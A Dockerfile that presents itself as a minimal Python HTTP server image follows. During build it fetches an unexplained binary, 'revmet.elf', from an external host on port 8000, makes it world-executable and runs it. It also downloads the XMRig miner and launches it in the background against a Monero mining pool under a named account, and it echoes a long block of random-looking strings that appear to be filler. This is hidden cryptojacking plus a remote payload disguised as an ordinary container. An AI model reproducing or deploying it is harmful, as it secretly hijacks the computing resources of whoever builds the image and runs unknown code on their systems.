FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo pXm7V8xSxNAXuD02JQo6KSKQ2AG4V6mS 1OY6R5BoF282MvtMPpA6pe7rqPlqZ97S 4MpeclmWgxHUWHLZPb8SFwfSHWmylhku fjXXzauFq0FQfB81poqb3slJhiHUkaV7 y4aymqfZijQqTpAlXeMQa3TyJOlNP4pX kHJhaMww1rlPOmJ9tME9jJKlsZTp0l3V ddKnozyGDahigUMpMhG0zxDZnePGzr3b 63EEVbhOt081RgTmqbgl1YnqKdGqX0L3 VnJx3419fYABoaPxdqmKk7YqAGPX3ulD X8yjQEsOBPJRgx1dUandm0BCIlf0iVC7 8TU9adL4Kpx38bqqgh23d1oARffdmbvI wQgasJS3eEw77ZGcZfsNpb4RsyQDHEza YmAtrRWdOBM07somDZvlE8uclRNoA8Zt 3AtlJt7HLV6P4CCmbheBkBwOqb8w3D2j DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]